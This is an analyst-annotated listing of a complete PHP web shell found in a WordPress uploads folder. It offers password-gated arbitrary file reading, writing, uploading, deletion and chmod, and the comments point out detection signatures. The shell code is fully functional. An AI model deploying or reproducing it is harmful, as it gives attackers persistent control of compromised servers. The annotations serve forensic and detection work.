File: /var/www/html/wp-content/uploads/2025/08/admin.php
<?php
// Analyst note: this listing is a password-gated web file manager (web shell).
// The listing header places it under wp-content/uploads, a directory expected
// to hold media rather than executable PHP. Denying PHP execution in upload
// directories and alerting on new *.php files there are the usual controls.
// Candidate content signatures visible in this file: the hard-coded digest in
// the login block and the 'File Manager By Professor6T9' heading/footer text.
//
// Sets the error-reporting level to 0, so the file operations further down
// produce no PHP warnings or notices when they fail.
error_reporting(0);
// Starts a PHP session; login state is kept in $_SESSION['logged_in'].
session_start();
// --- Logout Handling ---
// Any request carrying a `logout` query parameter empties the session array,
// destroys the session and redirects to the same URL without its query string.
if (isset($_GET['logout'])) {
$_SESSION = [];
session_destroy();
// strtok(..., '?') keeps only the part of REQUEST_URI before the first '?'.
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
// --- Login Handling ---
// Hard-coded credential check: the 32-hex-character literal below is compared
// (strict ===) with md5(md5(md5(<submitted password>))). The author's trailing
// comment labels it as the triple MD5 of 'password'; that is not verified here.
// Detection: the digest is a fixed string in the file, so it can serve as a
// content signature when sweeping a web root for copies of this script.
$p = "89029e2d3f77b399fbbad3776f225b1f"; // md5(md5(md5('password')))
// A matching POSTed `password` field sets the session flag and redirects to the
// same URL without its query string. The script itself keeps no record of
// failed attempts; a non-matching POST simply falls through to the login page.
if (isset($_POST['password']) && md5(md5(md5($_POST['password']))) === $p) {
$_SESSION['logged_in'] = 1;
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
// --- Gatekeeper: If not logged in, show login form and exit ---
// [MODIFIED] Uses the Tailwind CSS login page from the first script
// (translated; the author's original comment on this line was in Chinese).
// Requests without the session flag receive only this static page and the
// script stops, so an unauthenticated fetch shows a generic "Login" form and
// none of the file-manager markup. The form posts a single `password` field
// back to the same URL. The page references a script on cdn.tailwindcss.com,
// which a browser rendering the login page will request.
if (empty($_SESSION['logged_in'])) {
echo '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Login</title><script src="https://cdn.tailwindcss.com"></script></head><body class="bg-gray-100 flex items-center justify-center h-screen"><div class="bg-white p-8 rounded-lg shadow-md w-full max-w-sm"><h1 class="text-2xl font-bold mb-6 text-center">Login</h1><form method="post" class="space-y-4"><input type="password" name="password" placeholder="Password" class="w-full p-2 border rounded" autofocus required><button class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Login</button></form></div></body></html>';
exit;
}
// --- Everything below is the second script's original functionality, unchanged ---
// (Translated from the author's Chinese comment. Together with the [MODIFIED]
// comment earlier in the file it suggests the file was assembled from two
// separate scripts: a login page and a file manager.)
// --- ROBUST PATH HANDLING (FINAL FIX) ---
// HOME from the server environment, falling back to '/'; used for the [ HOME ] link.
$home = $_SERVER['HOME'] ?? '/';
$path = getcwd(); // Default to current directory
// A `path` query parameter selects the working directory for every action below.
if (isset($_GET['path'])) {
$temp_path = $_GET['path'];
// Normalize path and prevent directory traversal
// NOTE(review): the loop below only collapses '.', empty and '..' segments.
// Absolute paths are accepted further down and nothing ties the result to a
// base directory, so the reachable scope is any directory that passes
// is_dir() and is_readable() for the PHP process, not just the web root.
$temp_path = str_replace('\\', '/', $temp_path);
$parts = explode('/', $temp_path);
$safe_parts = [];
foreach ($parts as $part) {
if ($part === '.' || $part === '') continue;
if ($part === '..') {
if (!empty($safe_parts)) {
array_pop($safe_parts);
}
} else {
$safe_parts[] = $part;
}
}
// Determine if it's an absolute path
// Input starting with '/' or with a drive letter followed by ':\' is treated
// as absolute, and in both cases the rebuilt path is prefixed with '/'.
$is_absolute = (strpos($_GET['path'], '/') === 0 || preg_match('/^[a-zA-Z]:\\\\/', $_GET['path']));
$prefix = $is_absolute ? '/' : '';
$temp_path = $prefix . implode('/', $safe_parts);
// The requested directory is adopted only if it exists and is readable;
// otherwise $path stays at the current working directory.
if (is_dir($temp_path) && is_readable($temp_path)) {
$path = $temp_path;
}
}
// Use forward slashes, drop any trailing slash, and map an empty result to '/'.
$path = rtrim(str_replace('\\', '/', $path), '/');
if (empty($path)) $path = '/';
// State for the post-upload alert and the footer year.
$uploadSuccess = false;
$uploadMessage = '';
$currentYear = date("Y");
/**
 * HTML-escapes a value with htmlspecialchars() and ENT_QUOTES, so single and
 * double quotes are converted along with the other special characters.
 *
 * @param string $str Text to escape.
 * @return string Escaped text.
 */
function h($str) { return htmlspecialchars($str, ENT_QUOTES); }
/**
 * Recursively deletes a directory tree.
 *
 * Every entry matched by glob('<dir>/*') is unlinked, or recursed into when it
 * is a directory, and the directory itself is removed last. Returns without
 * doing anything when $dirPath is not a directory. The script keeps no copy
 * or log of what it removes.
 *
 * NOTE(review): a plain '*' pattern normally does not match dot-files, so such
 * entries, and a directory still containing them, may be left on disk. The
 * resulting rmdir() failure is silenced by '@'. Relevant when reconstructing
 * what a deletion actually removed.
 *
 * @param string $dirPath Directory to remove; a trailing '/' is added if absent.
 * @return void
 */
function delete_dir($dirPath) {
if (!is_dir($dirPath)) return;
if (substr($dirPath, -1) != '/') $dirPath .= '/';
// GLOB_MARK appends a slash to each directory match.
$files = glob($dirPath . '*', GLOB_MARK);
foreach ($files as $file) {
if (is_dir($file)) delete_dir($file);
else unlink($file);
}
@rmdir($dirPath);
}
// Handle POST Actions
// State-changing operations for an authenticated session. $path comes from the
// `path` query parameter handled earlier, so the directory being acted on is
// part of the request URL even for POSTs. The operation name and its arguments
// (`action`, `file`, `perms`, `file_path`, `content`, `old_name`, `new_name`,
// `selected_items[]`, multipart field `upload[]`) travel in the request body.
// Detection: POSTs to a PHP file under an uploads directory that are answered
// with a redirect whose Location starts with "?path=" match this block.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$action = $_POST['action'] ?? '';
// Upload is checked first, regardless of `action`. Each file is stored in
// $path under the basename of the client-supplied name. No check on extension
// or content is visible, so any file type, including further PHP, can be
// written wherever the PHP process has write access.
if (isset($_FILES['upload'])) {
$total_files = count($_FILES['upload']['name']);
$uploaded_count = 0;
for ($i = 0; $i < $total_files; $i++) {
if ($_FILES['upload']['error'][$i] == UPLOAD_ERR_OK) {
$dest = $path . '/' . basename($_FILES['upload']['name'][$i]);
if (move_uploaded_file($_FILES['upload']['tmp_name'][$i], $dest)) {
$uploaded_count++;
}
}
}
if ($uploaded_count > 0) {
$uploadSuccess = true;
$uploadMessage = "✅ {$uploaded_count} file(s) uploaded successfully!";
}
}
// batch_delete: removes each selected entry (by basename) from $path,
// recursing into directories via delete_dir().
elseif ($action === 'batch_delete' && !empty($_POST['selected_items'])) {
foreach ($_POST['selected_items'] as $item) {
$target = $path . '/' . basename($item);
if (file_exists($target)) {
if (is_dir($target)) delete_dir($target);
else unlink($target);
}
}
}
// chmod: `perms` is parsed as an octal number and applied to one entry in $path.
elseif ($action === 'chmod' && isset($_POST['file'], $_POST['perms'])) {
chmod($path . '/' . basename($_POST['file']), intval($_POST['perms'], 8));
}
// save_edit: writes the submitted `content` to `file_path` exactly as given.
// Unlike the other branches there is no basename() and no tie to $path, so
// this is a write to any location the PHP process can write. The redirect
// goes to the edited file's directory.
elseif ($action === 'save_edit' && isset($_POST['file_path'], $_POST['content'])) {
file_put_contents($_POST['file_path'], $_POST['content']);
header("Location: ?path=" . urlencode(dirname($_POST['file_path'])));
exit;
}
// rename: renames one entry within $path; both names are reduced to basenames.
elseif ($action === 'rename' && isset($_POST['old_name'], $_POST['new_name'])) {
rename($path . '/' . basename($_POST['old_name']), $path . '/' . basename($_POST['new_name']));
}
// Every POST other than save_edit ends with a redirect back to the listing.
if ($action !== 'save_edit') {
header("Location: ?path=" . urlencode($path));
exit;
}
}
// Handle GET Actions
// Both operations take their arguments from the query string, so the request
// URL itself names the file that was read or the entry that was deleted.
// Detection / forensics: look for "action=get_content&file=" and
// "action=delete&path=...&item=" in web-server access logs for this script.
if (isset($_GET['action'])) {
$action = $_GET['action'];
// get_content: returns the HTML-escaped contents of `file`. The value is used
// as given and is not tied to $path, so this reads any regular file the PHP
// process can read.
if ($action === 'get_content' && isset($_GET['file'])) {
$file_path = $_GET['file'];
if (is_file($file_path) && is_readable($file_path)) {
echo h(file_get_contents($file_path));
} else {
echo "Error: Cannot read file.";
}
exit;
}
// delete: removes one entry (by basename) from $path on a plain GET request,
// recursing into directories via delete_dir(), then redirects to the listing.
if ($action === 'delete' && isset($_GET['item'])) {
$target = $path . '/' . basename($_GET['item']);
if (file_exists($target)) {
if (is_dir($target)) delete_dir($target);
else unlink($target);
}
header("Location: ?path=" . urlencode($path));
exit;
}
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>📁</title>
<style>
body { background: #111; color: #eee; font-family: monospace; padding: 20px; }
a { color: #6cf; text-decoration: none; }
a:hover { text-decoration: underline; }
table { width: 100%; border-collapse: collapse; margin-top: 15px; background: #1c1c1c; }
th, td { padding: 8px; border: 1px solid #333; text-align: left; word-break: break-all; }
th { background: #2a2a2a; }
input, button, textarea {
background: #222; color: #eee; border: 1px solid #444; padding: 5px;
border-radius: 4px; font-family: monospace;
}
button { background: #6cf; color: #000; font-weight: bold; cursor: pointer; }
button.danger { background: #f66; color: #fff; }
.breadcrumb a { color: #ccc; margin-right: 5px; }
.breadcrumb span { color: #888; margin: 0 4px; }
.card { background: #1c1c1c; padding: 15px; border-radius: 8px; box-shadow: 0 0 10px #000; margin-top: 20px; }
footer { text-align: center; margin-top: 40px; color: #666; font-size: 0.9em; }
.modal { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: rgba(0,0,0,0.7); }
.modal-content { background-color: #1c1c1c; margin: 5% auto; padding: 20px; border: 1px solid #444; width: 80%; max-width: 800px; border-radius: 8px; display: flex; flex-direction: column; height: 80vh; }
.modal-header { padding-bottom: 10px; border-bottom: 1px solid #333; }
.modal-body { flex-grow: 1; margin: 10px 0; display: flex; flex-direction: column; }
.modal-body textarea { width: 100%; flex-grow: 1; resize: none; }
.modal-footer { padding-top: 10px; border-top: 1px solid #333; text-align: right; }
.close { color: #aaa; float: right; font-size: 28px; font-weight: bold; }
.close:hover, .close:focus { color: #fff; text-decoration: none; cursor: pointer; }
</style>
<?php /* Emits a JS alert only when the upload branch set $uploadSuccess; $uploadMessage is built by the script from a file count and fixed text. */ if ($uploadSuccess): ?>
<script>alert("<?= $uploadMessage ?>");</script>
<?php endif; ?>
</head>
<body>
<div style="display: flex; justify-content: space-between; align-items: center;">
<h2>📁 File Manager By Professor6T9</h2>
<a href="?logout=1" style="color: #f66; font-size: 0.9em;">Logout</a>
</div>
<form method="get">
<label>📂 Change Directory:</label>
<input type="text" name="path" value="<?= h($path) ?>" style="width:60%;">
<button type="submit">Go</button>
</form>
<div class="breadcrumb">
<?php
// Breadcrumb navigation: a root link, then one link per segment of $path, each
// pointing at the accumulated absolute path (URL-encoded; the label goes
// through h()). The final link points at $home.
$crumbs = explode('/', trim($path, '/'));
$accum = '';
echo '<a href="?path=/">/</a>';
if ($path !== '/') {
foreach ($crumbs as $crumb) {
if (empty($crumb)) continue;
$accum .= '/' . $crumb;
echo '<span>/</span><a href="?path=' . urlencode($accum) . '">' . h($crumb) . '</a>';
}
}
echo '<span>/</span><a href="?path=' . urlencode($home) . '">[ HOME ]</a>';
?>
</div>
<?php
// Shows a "parent directory" link unless dirname() returns the path itself,
// which is the case at the filesystem root.
$parent_path = dirname($path);
if ($parent_path !== $path): ?>
<p><a href="?path=<?= urlencode($parent_path) ?>">⬅️ [ PARENT DIR ]</a></p>
<?php endif; ?>
<div class="card">
<form method="post" enctype="multipart/form-data">
<input type="file" name="upload[]" required multiple>
<button type="submit">📤 Upload</button>
</form>
</div>
<form method="post" id="file-list-form">
<input type="hidden" name="action" value="batch_delete">
<div class="card">
<div style="margin-bottom: 10px;">
<button type="submit" class="danger" onclick="return confirm('Are you sure you want to delete all selected items?');">🗑️ Delete Selected</button>
</div>
<table>
<thead>
<tr>
<th><input type="checkbox" id="select-all-checkbox"></th>
<th>Name</th><th>Size (kB)</th><th>Modified</th><th>Perms</th><th>Actions</th>
</tr>
</thead>
<tbody>
<?php
// Directory listing for $path: directories first, then files, one table row
// each with size, mtime, octal permissions and per-entry actions. Filesystem
// calls are prefixed with '@', so unreadable entries produce no PHP warnings.
$items = @scandir($path);
if ($items === false) {
echo '<tr><td colspan="6" style="color: #f66;">Error: Cannot read directory. Check permissions.</td></tr>';
} else {
$dirs = $files = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
if (@is_dir($path . '/' . $item)) $dirs[] = $item;
else $files[] = $item;
}
$all = array_merge($dirs, $files);
foreach ($all as $item) {
// Avoid a double slash when listing the filesystem root.
$full = ($path === '/' ? '' : $path) . '/' . $item;
$isDir = is_dir($full);
// Last four octal digits of the mode, e.g. the permission bits.
$perm = substr(sprintf('%o', @fileperms($full)), -4);
$mtime = @filemtime($full);
$size = $isDir ? '-' : round(@filesize($full) / 1024, 2);
$date = $mtime ? date("Y-m-d H:i:s", $mtime) : '-';
echo '<tr>';
// Checkbox feeds the batch_delete POST (selected_items[]).
echo '<td><input type="checkbox" class="item-checkbox" name="selected_items[]" value="' . h($item) . '"></td>';
echo '<td>';
echo $isDir ? '<a href="?path=' . urlencode($full) . '">📁 ' . h($item) . '</a>' : '📄 ' . h($item);
echo '</td>';
echo "<td>$size</td><td>$date</td>";
// Permission box plus a button that submits the hidden chmod form.
echo '<td>
<input type="text" id="perms-input-' . h($item) . '" value="' . $perm . '" size="4" style="text-align:center;">
<button type="button" onclick="setChmod(\'' . h($item) . '\')">Set</button>
</td>';
echo '<td>';
echo '<a href="javascript:void(0)" onclick="openRenameModal(\'' . h($item) . '\')">✏️ Rename</a> | ';
// Single-item delete is a plain GET link (action=delete&path=...&item=...),
// so each use is recorded with its target in the request URL.
echo '<a href="?action=delete&path=' . urlencode($path) . '&item=' . urlencode($item) . '" onclick="return confirm(\'Delete this item?\')">🗑️</a>';
if (!$isDir) {
// Edit passes the full path to the get_content / save_edit handlers.
echo ' | <a href="javascript:void(0)" onclick="openEditModal(\'' . h($full) . '\')">📝 Edit</a>';
// Download href is the bare entry name, i.e. a URL relative to this script.
echo ' | <a href="' . h($item) . '" download>⬇️ Download</a>';
}
echo '</td></tr>';
}
}
?>
</tbody>
</table>
</div>
</form>
<footer>© <?= $currentYear ?> | File Manager by <a href="http://t.me/Professor6T9" target="_blank">@Professor6T9</a></footer>
<!-- Hidden form for chmod to avoid nesting -->
<form method="POST" id="chmod-form" style="display:none;">
<input type="hidden" name="action" value="chmod">
<input type="hidden" id="chmod_file_hidden" name="file">
<input type="hidden" id="chmod_perms_hidden" name="perms">
</form>
<!-- Modals -->
<div id="editModal" class="modal">
<div class="modal-content">
<div class="modal-header">
<span class="close" onclick="closeModal('editModal')">×</span>
<h3>Edit File</h3>
</div>
<form method="POST" class="modal-body">
<input type="hidden" name="action" value="save_edit">
<input type="hidden" id="edit_file_path" name="file_path">
<textarea id="edit_content" name="content"></textarea>
<div class="modal-footer">
<button type="submit">💾 Save</button>
</div>
</form>
</div>
</div>
<div id="renameModal" class="modal">
<div class="modal-content" style="height: auto;">
<div class="modal-header"><span class="close" onclick="closeModal('renameModal')">×</span><h3>Rename Item</h3></div>
<form method="POST" class="modal-body">
<input type="hidden" name="action" value="rename">
<input type="hidden" id="rename_old_name" name="old_name">
<label>New Name:</label>
<input type="text" id="rename_new_name" name="new_name" style="width: 100%;">
<div class="modal-footer"><button type="submit">✏️ Rename</button></div>
</form>
</div>
</div>
<script>
function closeModal(id) {
document.getElementById(id).style.display = 'none';
}
/**
 * Opens the edit modal for a file.
 * Stores filePath in the hidden `file_path` field of the save_edit form, then
 * requests `?action=get_content&file=<encoded path>` and places the response
 * text in the textarea. Each use therefore produces a GET request whose query
 * string names the file being opened.
 */
function openEditModal(filePath) {
const modal = document.getElementById('editModal');
const contentArea = document.getElementById('edit_content');
document.getElementById('edit_file_path').value = filePath;
contentArea.value = 'Loading content...';
modal.style.display = 'block';
fetch(`?action=get_content&file=${encodeURIComponent(filePath)}`)
.then(response => response.text())
.then(data => { contentArea.value = data; })
.catch(error => { contentArea.value = 'Error loading file content: ' + error; });
}
/**
 * Opens the rename modal with both the hidden old-name field and the visible
 * new-name field pre-filled with oldName, then focuses the new-name input.
 */
function openRenameModal(oldName) {
document.getElementById('rename_old_name').value = oldName;
document.getElementById('rename_new_name').value = oldName;
document.getElementById('renameModal').style.display = 'block';
document.getElementById('rename_new_name').focus();
}
/**
 * Copies the permission string from the row's 'perms-input-<fileName>' box and
 * the file name into the hidden chmod form, then submits it, which sends a
 * POST with action=chmod to the current URL.
 */
function setChmod(fileName) {
const permsValue = document.getElementById('perms-input-' + fileName).value;
document.getElementById('chmod_file_hidden').value = fileName;
document.getElementById('chmod_perms_hidden').value = permsValue;
document.getElementById('chmod-form').submit();
}
// Page wiring, run once the DOM is ready.
document.addEventListener('DOMContentLoaded', function() {
// "Select all" checkbox mirrors its state onto every row checkbox.
const selectAllCheckbox = document.getElementById('select-all-checkbox');
if (selectAllCheckbox) {
selectAllCheckbox.addEventListener('change', function() {
const itemCheckboxes = document.querySelectorAll('.item-checkbox');
itemCheckboxes.forEach(checkbox => { checkbox.checked = this.checked; });
});
}
// Clicking an element that carries the 'modal' class (the backdrop) hides it.
window.onclick = function(event) {
if (event.target.classList.contains('modal')) {
event.target.style.display = "none";
}
}
});
</script>
</body>
</html>